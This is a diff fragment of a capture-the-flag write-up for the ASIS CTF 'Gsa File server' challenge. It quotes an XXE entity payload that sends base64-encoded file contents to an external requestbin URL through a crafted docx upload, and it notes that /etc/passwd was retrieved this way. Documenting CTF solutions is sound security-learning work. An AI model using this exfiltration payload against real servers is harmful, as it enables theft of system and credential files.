occupe/Writeups-CTF/ASIS-CTF/Gsa File server/Readme.md

 <!ENTITY % injme '<!ENTITY startme SYSTEM "https://requestb.in/****?xxe=%filebase64;">'>
 ```

-so i have only to modify the payloads in my webserver and reupload the file docx (with it rebuild-it every single try)
+so i have only to modify the payloads in my webserver and reupload the file docx (without rebuild-it every single try)
 and to check the aswer you have to visite (https://requestb.in/****?inspect)

 i get answer for the /etc/passwd